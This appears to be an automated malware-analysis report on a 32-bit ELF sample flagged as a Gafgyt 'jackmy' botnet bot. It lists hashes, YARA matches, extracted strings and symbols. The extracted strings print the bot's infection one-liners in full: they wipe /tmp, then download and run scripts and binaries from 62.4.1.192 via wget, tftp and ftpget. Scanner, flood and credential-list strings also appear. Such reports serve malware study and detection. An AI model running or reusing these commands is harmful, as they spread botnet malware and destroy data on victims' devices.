Report #3475 cancel

Binary
ABI
ELFOSABI_SYSV
Size
115.10KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
1e3eb990093ab52d6bab2f4d2faa0899
sha1
e55e89156d3cb193c3db91b79578c3a3f6dd17f1
crc32
0x337fc677
sha224
60c64ebf4b6233b958b24b605ce2683d8e565a641ba38b8b0603774d
sha256
2a5c4b8a739b4c1c85f4866abb02a4699112d09d60ea41b1190127412029eb54
sha384
8c3d21578b2dc63b8b8a19570c5cb71115cf6e4a6b4ec75d0fc9b09cd101fd390686485211657ad18c3e4664677f21be
sha512
54017a83de9d6435b0f22917293c683df80b7942e49a6ec40cbab612f41dde73082f2cd2961eb09c58c20a8fb460d2a01a1ded9264ec6875af6d00caff330dd1
ssdeep
3072:rZPdcFxxsBkOxYvDn64tQBQlS4eIpmLZ0PYKSDDIQ:eAkOObnTqBCeIpmLZ0PYKSDDIQ
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, Gafgyt_Botnet_jackmy, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/net/route
Password

Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
62.4.1.192, cd /tmp; rm -fr *; wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, cd /tmp; rm -fr *; busybox wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; busybox sh gtop.sh; busybox tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; busybox sh tftp1.sh; busybox tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; busybox sh tftp2.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, cd /tmp; wget http://62.4.1.192/jackmyarmv4; chmod +x jackmyarmv4; ./jackmyarmv4; rm -fr jackmyarmv4; exit, cd /var/; rm -rf sshd; wget http://62.4.1.192/jackmymipsel || tftp -r jackmymipsel -g 62.4.1.192; chmod 777 jackmymipsel; ./jackmymipsel; rm -rf jackmymipsel, Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
URLs
cd /tmp; rm -fr *; wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, cd /tmp; rm -fr *; busybox wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; busybox sh gtop.sh; busybox tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; busybox sh tftp1.sh; busybox tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; busybox sh tftp2.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, cd /tmp; wget http://62.4.1.192/jackmyarmv4; chmod +x jackmyarmv4; ./jackmyarmv4; rm -fr jackmyarmv4; exit, cd /var/; rm -rf sshd; wget http://62.4.1.192/jackmymipsel || tftp -r jackmymipsel -g 62.4.1.192; chmod 777 jackmymipsel; ./jackmymipsel; rm -rf jackmymipsel, AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex), AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy), AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs), AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k), AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan), AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr), AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication), AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout), AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23), AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver), AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k), magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net), Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+), Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+), MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+), MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+), Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
Mails

Suspicious
True check_circle
Strings
List
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
cd /tmp; rm -fr *; wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
cd /tmp; rm -fr *; busybox wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; busybox sh gtop.sh; busybox tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; busybox sh tftp1.sh; busybox tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; busybox sh tftp2.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
cd /tmp; wget http://62.4.1.192/jackmyarmv4; chmod +x jackmyarmv4; ./jackmyarmv4; rm -fr jackmyarmv4; exit
cd /var/; rm -rf sshd; wget http://62.4.1.192/jackmymipsel || tftp -r jackmymipsel -g 62.4.1.192; chmod 777 jackmymipsel; ./jackmymipsel; rm -rf jackmymipsel
%s %s HTTP/1.1
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
User-Agent: %s
kill -9 %s
Network is down
Machine is not on the network
62.4.1.192
No route to host
Host is down
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Unknown host
been_there_done_that.2832
[TELNET] SCANNER OFF:%s
[PHONE] SCANNER OFF:%s
kill -9 $(pidof %s)
been_there_done_that
[PHONE] SCANNER ON:%s
[TELNET] SCANNER ON:%s
_fwrite.c
open.c
[31mPhone Cracked
write.c
contains_fail
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Object is remote
Is a named type file
No such device
Too many open files in system
Too many open files
Too many links
Link has been severed
Connection reset by peer
.lib section in a.out corrupted
ICMPFlood
Cannot send after transport endpoint shutdown
ping %s -s %s -i %s -w %s
Operation not permitted
My IP: %s
NETIS SCANNER ON:%s
Connection: %s
8.8.8.8
Server_Botport
[37madmin
[36mUsername
[31mUsername
dnslookup.c
[31mPassword
[36mPassword
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
PONG!
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__open_nameservers
__nameserver
__socketcall
__GI_execve
__register_frame_info_bases
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
get_telstate_host
__deregister_frame_info_bases
gethostbyname.c
socket_connect
gethostbyname_r
opennameservers.c

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, premscus.c, C.3.4250, C.0.4233, C.8.4295, C.13.4392, c, Q, i.4446, printchar, prints, printi, print, fdopen_pids, hextable, get_random_ip, ipState, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, access.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, geteuid.c, getpid.c, getppid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, puts.c, sprintf.c, vsnprintf.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.3991, _fixed_buffers, _wcommit.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4201, prefix.4202, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4203, qual_chars.4208, spec_chars.4204, spec_ranges.4205, spec_or_mask.4206, spec_and_mask.4207, fputc_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1161, _string_syserrmsgs.c, bcopy.c, strcasestr.c, strtok.c, next_start.1109, isatty.c, tcgetattr.c, ntohl.c, herror.c, error_msg, h_errlist, colon_space.2762, inet_ntoa.c, buf.2658, inet_makeaddr.c, gethostbyname.c, buf.4993, h.4992, gethostbyname_r.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.2832, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, __C_ctype_tolower.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, fprintf.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, vfprintf.c, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, poll.c, fclose.c, fopen.c, fseeko.c, fseeko64.c, _adjust_pos.c, _fopen.c, _cs_funcs.c, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3116, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, userID, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, contains_fail, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __GI_tolower, putc_unlocked, recv, connect, __encode_question, __GI___uClibc_fini, D3cOdeMePlS, numpids, __encode_header, __GI_strncat, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_vsnprintf, __GI_setsid, Phonepid, memmove, sendTCP, __bsd_signal, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, getc_unlocked, __ctype_b, __GI_random_r, usernames, sendUKNOWN, errno, getegid, read_until_response, __GI_sbrk, zprintf, NetisPid, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, HackerScan1, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, __GI_fputs_unlocked, execl, NetisScanner, __GI_fgets, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, puts, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, tolower, getuid, system, __open_etc_hosts, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, phonepayload, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, D1ckSuckaz, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_herror, __GI_open, __GI_strchr, __searchdomain, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, D1ckSucka, __GI_inet_ntoa_r, hostname_to_ip, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, getBuild, Server_Botport, fprintf, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, TelnetPayload2, __GI_brk, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, __GI_strcmp, CommandPayload, __GI_memmove, sendSTD, setstate, __decode_dotted, HackaShit, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, strcasestr, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, __decode_header, __GI___h_errno_location, __GI_memcpy, strcoll, wcsrtombs, _stdio_user_locking, strncpy, strcasecmp, htonl, sendto, __C_ctype_toupper, __GI___C_ctype_b, __GI_gethostbyname_r, __GI_strncpy, TelnetPayload, __libc_send, PhoneScanner, __GI___xpg_strerror_r, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, __GI___fputc_unlocked, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, fork, __stdio_rfill, strncat, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, fopen, __bss_start, __libc_open, getOurIP, get_telstate_host, memset, __GI_socket, main, __glibc_strerror_r, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, getppid, tcgetattr, __C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, fdpopen, __GI_fprintf, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, botkiller, herror, strcmp, advances2, __nameserver, data_start, HackerScan, __GI_sysconf, __h_errno_location, __GI_putc_unlocked, matchPrompt, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, __GI_vfprintf, _stdio_term, __decode_answer, __GI_signal, stderr, fails, vfork, __C_ctype_b, srandom, ICMPFlood, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __libc_fork, LoginPayload, __atexit_lock, scanPid, rand_cmwc, findARandomIP, advances, __libc_fcntl64, getsockopt, __GI_fseeko64, hstrerror, fflush_unlocked, __stdio_wcommit, HackerPrint, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, access, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, phone, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, PhoneScan, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, _dl_aux_init, _errno, atoi, successes, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___errno_location, fputc_unlocked, fcntl, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, pids, sendCNC, vfprintf, strpbrk, _load_inttype, rangechoice, raise, useragents, free, sigprocmask, __fputc_unlocked, getsockname
Number
777
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False cancel
Segments
Number
3
Suspicious
False cancel
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
170
Suspicious
True check_circle
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , premscus.c, , C.3.4250, , C.0.4233, , C.8.4295, , C.13.4392, , c, , Q, , i.4446, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , get_random_ip, , ipState, , libc/sysdeps/linux/i386/vfork.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , access.c, , chdir.c, , close.c, , dup2.c, , fork.c, , getdtablesize.c, , geteuid.c, , getpid.c, , getppid.c, , getrlimit.c, , ioctl.c, , kill.c, , open.c, , pipe.c, , prctl.c, , read.c, , select.c, , setsid.c, , sigprocmask.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , __errno_location.c, , puts.c, , sprintf.c, , vsnprintf.c, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.3991, , _fixed_buffers, , _wcommit.c, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.4201, , prefix.4202, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.4203, , qual_chars.4208, , spec_chars.4204, , spec_ranges.4205, , spec_or_mask.4206, , spec_and_mask.4207, , fputc_unlocked.c, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strchr.c, , strcpy.c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1161, , _string_syserrmsgs.c, , bcopy.c, , strcasestr.c, , strtok.c, , next_start.1109, , isatty.c, , tcgetattr.c, , ntohl.c, , herror.c, , error_msg, , h_errlist, , colon_space.2762, , inet_ntoa.c, , buf.2658, , inet_makeaddr.c, , gethostbyname.c, , buf.4993, , h.4992, , gethostbyname_r.c, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , 